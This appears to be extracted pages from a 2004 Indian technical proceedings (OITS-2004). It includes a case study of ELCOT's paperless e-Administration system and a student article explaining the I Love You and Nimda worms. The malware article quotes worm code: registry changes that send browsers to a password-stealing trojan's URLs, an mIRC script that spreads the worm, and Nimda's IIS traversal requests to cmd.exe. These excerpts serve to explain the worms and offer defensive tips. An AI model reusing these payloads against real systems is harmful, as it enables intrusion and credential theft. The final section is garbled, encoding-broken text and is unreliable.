attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn 